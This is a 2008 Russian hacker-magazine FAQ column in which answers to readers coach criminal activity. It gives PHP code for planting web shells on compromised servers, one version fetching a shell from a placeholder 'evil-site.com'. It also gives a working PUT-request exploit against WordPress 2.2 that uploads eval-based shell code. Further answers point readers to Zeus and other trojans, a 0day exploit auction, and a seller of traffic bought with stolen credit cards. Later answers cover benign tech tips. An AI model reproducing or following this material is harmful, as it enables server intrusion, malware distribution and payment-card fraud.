Издательский дом ООО "Гейм Лэнд"ЖУРНАЛ ХАКЕР 109, ЯНВАРЬ 2008 г.

FAQ United

Маг / ICQ# 884888/

Хакер, номер #109, стр. 138

Степан Ильин / step@real.xakep.ru /

Q: Подскажи сервис для проверки Google PageRank.

A: По неподтвержденным слухам гугловодов, наш любимый поисковик вообще собирается отменить такой нужный в деле SEO PageRank. Но пока этого не произошло, я могу тебе посоветовать очень хорошие сервисы для твоих оптимизаторских нужд:

1. http://n0body.com/scripts/adv/pr.php - полуприватный сервис, который позволяет проверять PR списка сайтов, а также бэклинки на каждый из сайтов. Также в качестве бонуса здесь присутствует и отображение графика популярности сайта в Alexa-рейтинге.

P.S. Сервис не требует ввода капчи.

2. http://intop20.com/search.php - просто незаменимый сервис для каждого сеошника! Поиск под амерской проксей в Гугле, Яху, msn; отображение Google PageRank, Alexa rank.

P.S. Требует однократного ввода капчи.

3. www.mcdar.net/q-check/datatool.asp - интересный сервис для отображение PR и бэклинков в разных дата-центрах Гугла по двум параметрам: кейворд и сайт.

P.S. Не требует ввода капчи.

4. http://dkameleon.com/scripts/pagerank/mass.php - еще один замечательный сервис для массовой проверки PR; в отличие от первой ссылки, глюков не наблюдается никогда, плюс можно выбирать дата-центры Гугла.

P.S. Требует ввода капчи при каждом новом поиске.

5. www.prchecker.net/rank2.php?url=http://сайт_для_проверки_PR - просто картинка :). Открываешь ее в браузере и смотришь PR нужного тебе сайта. Удобно использовать в своих самопальных скриптах.

Q: Я взломал сайт, но на сервере нет ни одной никсовой качалки, а также включен php safe-mode. Как залить свой файл?

A: Все элементарно до безобразия :). Я не буду тебе советовать извращенные FTP-сценарии, тем более что про них ты всегда можешь прочитать в предыдущих номерах журнала. Я подскажу тебе пару трюков с PHP-сценариями на тему заливки файлов на сервер:

1. Банальное копирование файла с удаленного сервака, если разрешена директива allow_url_fopen (а она разрешена по умолчанию).

<?php

copy('http://evil-site.com/shell.txt','./hacked_site/shell.php');

?>

2. Если allow_url_fopen обламывает тебе все, что только можно, то ничего не остается, кроме как наколбасить простой сценарий для загрузки файлов на сервер.

<?php

<form enctype="multipart/form-data" action="" method="post">

<input type="hidden" name="MAX_FILE_SIZE" value="30000000" />

File to upload:<input name="uploadfile" type="file" />

<input type="submit" value="Send File" />

</form>

if(!empty($HTTP_POST_FILES['uploadfile']['name']))

{

@copy($HTTP_POST_FILES['uploadfile']['tmp_name'],

'./'.$HTTP_POST_FILES['uploadfile']['name']) ?

print '<b>File '.$HTTP_POST_FILES['uploadfile']['name'].

' upload good!</b><br/>' : print '<b>Upload error!</b><br/>'";

}

?>

3. А если и с аплоадом наш любимый PHP тебя крупно обломал, то у меня припасен еще один сценарий. Тебе нужно передать в него POST-данные, в которых уже зашит шелл :).

<?php

$shell=file_get_contents('php//input'); //все из входящего потока данных

$fp=fopen('shell.php','w');

fwrite($fp, $shell);

fclose($fp);

?>

И второй сценарий для передачи зловредного кода предыдущему скрипту:

<?php

$site='hacked.site.com';

$path='/first_script.php';

$fp = fsockopen($site, 80, $errno, $errstr, 30);

$data='<?php eval(stripslashes($_GET[a])) ?>'; //зловредный код шелла

$out = "POST $path HTTP/1.1\r\n";

$out .= "Host: $site\r\n";

$out .= "Content-type: multipart/form-data\r\n";

$out .= "Connection: Close\r\n";

$out .= "User-Agent: Opera\r\n";

$out .= "Content-Length: ".strlen($data)."\r\n\r\n";

fwrite($fp, $out.$data);

fclose($fp);

?>

P.S. Конечно же, для всех этих сценариев необходима любая директория, доступная для записи и видная извне.

Q: Я знаю, что такое POST-, GET-, COOKIE-запросы; подскажи, что такое PUT-запрос и как им воспользоваться в хакерских целях?

A: PUT-запросы, приятель, это тебе не Сounter-strike сетке :). Приведу недавний пример использования бага с PUT в популярном блоговом движке WordPress 2.2:

<?php

$site='wordpress.com';

$path='/wp-app.php?action=/attachment/file/1182';

$fp = fsockopen($site, 80, $errno, $errstr, 30);

$data='<?php eval(stripslashes($_GET[a])) ?>';

$out = "PUT $path HTTP/1.1\r\n";

$out .= "Host: $site\r\n";

$out .= "Content-type: image/gif\r\n";

$out .= "Connection: Close\r\n";

$out .= "User-Agent: 1\r\n";

$out .= "Cookie: wordpressuser_e086b04c6e1927359687c53cb1d1db11=

vitaliysych;wordpresspass_e086b04c6e1927359687c53cb1d1db11=

5154aa972ab41b24fa6c58128836b9a5;\r\n";

$out .= "Content-Length: ".strlen($data)."\r\n\r\n";

fwrite($fp, $out.$data);

fclose($fp);

?>

Смотри: скрипт wp-app.php принимает любой файл, переданный с помощью PUT и подписанный как картинка (Content-type: image/gif). Соответственно, картинку передавать нам нет смысла, и мы передадим наш зловредный код, который скрипт успешно сохранит в указанном нами месте (в конкретном примере с WordPress место для сохранения указывается в поле _wp_attached_file при написании нового поста). А это чревато обретением шелла на нужном сервере :). Так что советую тебе пропарсить популярные движки на предмет присутствия слова PUT в исходниках.

P.S. Естественно, для использования этого бага нужно знать открытую на запись директорию.

Q: Отправляю деньги по WebMoney, но они не доставляются адресату, хотя куда-то уходят! Как такое возможно и как от этого защититься?!

A: Поздравляю! Ты подхватил известнейшего в определенных кругах троянца – WM-троя от Дамрая :). Эта зверюшка при любой транзакции нагло подставляет в твой кипер левый номер кошелька, прописанный в ней, вместо введенного тобой WMZ-WMR-кошелька получателя денег. В итоге деньги ты отправляешь не тому, кому планировал, а безымянному хакеру. Защититься от напасти довольно легко: просто никогда не пользуйся копипастом при операциях с деньгами! Троянец постоянно следит за буфером обмена твоей Винды и, как только там появляется что-то похожее на R- или Z-кошелек, моментально меняет его на свой. Просто вводи все номера кошельков ручками :). И, конечно же, тебе следует почиститься от зверьков касперами, пандами и нодами, которые уже давно опознают заразу :).

Q: Не знаешь, где можно купить приватные эксплойты?

A: Отчего же не знать? Знаю. В последнее время очень большую популярность сыскал буржуйский аукцион 0day-эксплойтов WabiSabiLabi, расположенный по адресу http://wslabi.com. Сервису всего лишь несколько месяцев отроду, но его уже вовсю облюбовали разные маститые хакеры :). После простой регистрации на аукционе ты сам сможешь продавать свои сплоиты, принимать участие в торгах, подписаться на рассылку о новых сплоитах (причем тему рассылки можно выбирать: сплоиты под веб-приложения, под Винду, никсы и т.д.). Из последних размещенных на продажу сплоитов могу привести некоторые, особенно понравившиеся мне:

  • FreeBSD 6.2 suffers from a remote DoS able to kernel panic the remote host (цена €1,5k).
  • Quicktime 7.2 suffers from a remote vulnerability (цена €1k).
  • Samba 2.2.12 suffers from a remote vulnerability (цена €0,5k).

Ну как? Уже потекли слюнки? Хочу лишь напомнить, что это аукцион, так что цена далеко не окончательная :).

P.S. На WabiSabiLabi недавно продавался приватный сплоит под всеми любимый WordPress, так что заходи почаще. Стоит один раз потратить деньги на сплоит, чтоб потом поднять на нем в разы больше.

Q: Посоветуй, где взять хорошего троя; pinch уже не катит.

A: Хороших паблик-троянцев сейчас уже не найти. Могу посоветовать некоторые из тех, что лишь недавно вышли из жесткого привата: Limbo, Zeus, Corpse, Agent DQ, Zupacha.

Эти и другие полуприватные проги часто выкладывают на «злом» форуме, например, в теме «Приватный софт» (https://forum.zloy.org/showthread.php?t=7951).

Только предупреждаю: доверяй (юзерам, которые выкладывают этот софт), но проверяй (поскольку троян, зашитый в другой троян, уже не редкость).

Q: Подскажи контору, которая продает траф по кредиткам без прозвонов.

A: http://advertyz.com - замечательная контора для твоего кардерского трафа. После вбива кредитки траф можно гнать куда угодно: на адалт, на партнерки, на загрузки, на ppc. В общем, при желании можно наслаждаться качественным и почти халявным трафиком :).

Q: Взломал сайт на паблик-движке и залил туда свои доры. Подскажи, как обезопасить доры от кражи?

A: Обычно доры воруют на сайтах, взломанных с помощью паблик-уязвимостей. Чтобы избежать этого, найди открытые на запись конфигурационные файлы паблик-движка (или инклуд на худой конец :)) и вставь в любое место PHP-кода следующее:

<?

$post_arr=implode('.',$_POST);

$get_arr=implode('.',$_GET);

$cook_arr=implode('.',$_COOKIE);

$post_arr_key=implode('.',@array_flip($_POST));

$get_arr_key=implode('.',@array_flip($_GET));

$cook_arr_key=implode('.',@array_flip($_COOKIE));

$other_shtuki=@file_get_contents('php://input');

$cracktrack = strtolower($post_arr.$get_arr.$cook_arr.$post_arr_key.$get_arr_key.$cook_arr_key.$other_shtuki);

$wormprotector = array('union','select','substring','/**/'); //тут дополни по своему вкусу кейворды SQL- и PHP-инжекторов

$checkworm = str_replace($wormprotector, '*', $cracktrack);

if ($cracktrack != $checkworm)

die("");

?>

В результате все паблик-сплоиты идут лесом, поскольку любой запрос к скрипту, где присутствует что-либо похожее на SQL-инъекцию, жестко проверяется, и, если что, взломщик шлется куда подальше :).

Q: Какие ты знаешь сервисы онлайн-расшифровки MD5-хэшей помимо http://passcracking.ru?

A: Сервисов по кряку MD5 в последнее время стало очень и очень много. Поэтому вот тебе моя небольшая подборочка:

Q: Я слышал, что последний Ubuntu может угробить жесткий диск в ноутбуке. Что за бред?

A: Да, действительно, в Ubuntu 7.10 есть скрипт, который, по идее, должен увеличивать длительность автономной работы ноутбука, отключая питание винчестера, когда тот не требуется. На практике запуск и остановка жесткого диска происходят несколько раз в минуту, причем независимо от того, работает ли бук от батарейки или от постоянной сети. У всех жестких дисков есть параметр Load Cycles, значение которого увеличивается на единицу при каждой остановке/разгоне шпинделя или же при парковке/депарковке головки. Максимальное значение Load Cycles для свежих винчестеров составляет 600 000 раз. Несложно посчитать, на сколько времени хватит жесткого диска, если некорректный скрипт оперирует с его питанием несколько раз в минуту! На форуме Убунту предлагается решить проблему, введя в консоли:

$ sudo hdparm -B 255 /dev/sda

На параметр В система должна вернуть:

/dev/sda:

setting Advanced Power Management level to disabled

После этого вводится еще одна команда:

$ sudo hdparm -S 0 /dev/sda

На нее система должна ответить следующим сообщением:

/dev/sda:

setting standby to 0 (off)

После этого Load_Cycle_Count должен остановиться. Если этого не произошло, можно попробовать все заново, но в качестве параметра первой команде передать не 255, а 254.

Q: Помогите, нужно получить доступ к удаленному рабочему столу компьютера из корпоративной локалки. Внешнего IP, само собой, нет; пробросить порт никто не даст; и, что еще хуже, никакие программы установить нельзя (нет прав админа). Есть ли у вас вариант решения проблемы?

A: Решений на самом деле несколько. Самое банальное – это организовать туннель, например с помощью stunnel (www.stunnel.org), и через него пустить трафик какой-нибудь самой обыкновенной программы, сойдет даже банальный Remote Administrator (www.radmin.com). На официальном сайте туннеля доступны бинарники как для никсов, так и для Винды.

Но если хочешь более простое и изящное решение, то рекомендую тебе сервис TeamViewer (www.teamviewer.com). Тут все просто: на каждом из компьютеров запускается своя копия утилиты. В окне программы тут же отображаются два параметра: ID (например, 24 151 610) и password. Вот как раз эти самые параметры и используются для подключения в любую сторону. Просто введи данные на клиентской машине, выбери Remote support и смело жми на Connect to partner. Вот и все – доступ к удаленному рабочему столу получен. А как быть с инсталляцией? Можно было бы заморочиться созданием портированной версии с помощью Thinstall или похожего продукта, однако разработчики TeamViewer уже позаботились об этом сами и выложили на официальном сайте portable-версию. Кстати говоря, сервис абсолютно бесплатный.

Q: Есть замечательное онлайн-радио www.last.fm, но, когда все пользователи локалки начинают к нему коннектиться, канал, естественно, проседает. А как бы взять поток с этого сервиса и ретранслировать в локальную сеть, чтобы пользователи подключались к нему через Winamp и без использования интернета?

A: Да проще простого. Специально для этих целей была создана одна замечательная программа - LastFMProxy (http://vidar.gimp.org/?page_id=50). Она как раз обладает нужной функциональности. Что особенно интересно, написана она на скриптовом языке Python и поэтому может быть легко портирована под разные ОС.

Q: На сайте Microsoft.com нашел кучу обучающего видео по программированию на Visual Studio. Проблема в том, что просто закачать его нельзя — оно отображается только в браузере. Как быть?

A: Для того чтобы сохранить на жесткий диск файл в формате потокового видео (streaming video), нам потребуются три программы: URL Snooper (www.donationcoder.com/Software/ Mouser/urlsnooper), MPlayer (www.mplayerhq.hu) и ASFBin (www.radioactivepages.com).

Предположим, что мы хотим скачать файл, который проигрывается на заданной странице:

1. До перехода на страницу запускаем URL Snooper, в графе Protocol Filter выбираем Multimedia URLs и нажимаем на клавишу Sniff Network.

2. Далее переходим на нужную страницу.

3. В списке ссылок URL Snooper отыскиваем и копируем ссылку на mms-поток, содержащий искомый файл.

4. Из командной строки запускаем MPlayer, вставив в нужное место ссылку на mms-поток. Например, так:

mplayer mms://vid.walla.co.il/video/armageddon/190239-6.wmv -dumpstream -dumpfile file.wmv

5. После того как видео скачается, получившийся файл file.wmv надо проиндексировать, разблокировав возможность перемотки. Это делается при помощи утилиты ASFBin из той же командной строки:

asfbin -i file.wmv -o file-indexed.wmv –forceindex

file.wmv теперь можно стереть, поскольку готовый видеоролик будет сохранен в файл file-indexed.wmv. Надо сказать, что для последней версии ASFBin на сайте появилась также GUI-версия и заморачиваться в консоли в принципе не требуется. Да и вообще, вместо связки mplayer+asfbin можно использовать HiDownload (www.hidownload.com) и WMRecorder (www.wmrecorder.com). А пользователи браузера Firefox вместо URL Snooper могут заюзать плагин MediaPlayerConnectivity.

Содержание
загрузка...
Журнал Хакер #151Журнал Хакер #150Журнал Хакер #149Журнал Хакер #148Журнал Хакер #147Журнал Хакер #146Журнал Хакер #145Журнал Хакер #144Журнал Хакер #143Журнал Хакер #142Журнал Хакер #141Журнал Хакер #140Журнал Хакер #139Журнал Хакер #138Журнал Хакер #137Журнал Хакер #136Журнал Хакер #135Журнал Хакер #134Журнал Хакер #133Журнал Хакер #132Журнал Хакер #131Журнал Хакер #130Журнал Хакер #129Журнал Хакер #128Журнал Хакер #127Журнал Хакер #126Журнал Хакер #125Журнал Хакер #124Журнал Хакер #123Журнал Хакер #122Журнал Хакер #121Журнал Хакер #120Журнал Хакер #119Журнал Хакер #118Журнал Хакер #117Журнал Хакер #116Журнал Хакер #115Журнал Хакер #114Журнал Хакер #113Журнал Хакер #112Журнал Хакер #111Журнал Хакер #110Журнал Хакер #109Журнал Хакер #108Журнал Хакер #107Журнал Хакер #106Журнал Хакер #105Журнал Хакер #104Журнал Хакер #103Журнал Хакер #102Журнал Хакер #101Журнал Хакер #100Журнал Хакер #099Журнал Хакер #098Журнал Хакер #097Журнал Хакер #096Журнал Хакер #095Журнал Хакер #094Журнал Хакер #093Журнал Хакер #092Журнал Хакер #091Журнал Хакер #090Журнал Хакер #089Журнал Хакер #088Журнал Хакер #087Журнал Хакер #086Журнал Хакер #085Журнал Хакер #084Журнал Хакер #083Журнал Хакер #082Журнал Хакер #081Журнал Хакер #080Журнал Хакер #079Журнал Хакер #078Журнал Хакер #077Журнал Хакер #076Журнал Хакер #075Журнал Хакер #074Журнал Хакер #073Журнал Хакер #072Журнал Хакер #071Журнал Хакер #070Журнал Хакер #069Журнал Хакер #068Журнал Хакер #067Журнал Хакер #066Журнал Хакер #065Журнал Хакер #064Журнал Хакер #063Журнал Хакер #062Журнал Хакер #061Журнал Хакер #060Журнал Хакер #059Журнал Хакер #058Журнал Хакер #057Журнал Хакер #056Журнал Хакер #055Журнал Хакер #054Журнал Хакер #053Журнал Хакер #052Журнал Хакер #051Журнал Хакер #050Журнал Хакер #049Журнал Хакер #048Журнал Хакер #047Журнал Хакер #046Журнал Хакер #045Журнал Хакер #044Журнал Хакер #043Журнал Хакер #042Журнал Хакер #041Журнал Хакер #040Журнал Хакер #039Журнал Хакер #038Журнал Хакер #037Журнал Хакер #036Журнал Хакер #035Журнал Хакер #034Журнал Хакер #033Журнал Хакер #032Журнал Хакер #031Журнал Хакер #030Журнал Хакер #029Журнал Хакер #028Журнал Хакер #027Журнал Хакер #026Журнал Хакер #025Журнал Хакер #024Журнал Хакер #023Журнал Хакер #022Журнал Хакер #021Журнал Хакер #020Журнал Хакер #019Журнал Хакер #018Журнал Хакер #017Журнал Хакер #016Журнал Хакер #015Журнал Хакер #014Журнал Хакер #013Журнал Хакер #012Журнал Хакер #011Журнал Хакер #010Журнал Хакер #009Журнал Хакер #008Журнал Хакер #007Журнал Хакер #006Журнал Хакер #005Журнал Хакер #004Журнал Хакер #003Журнал Хакер #002Журнал Хакер #001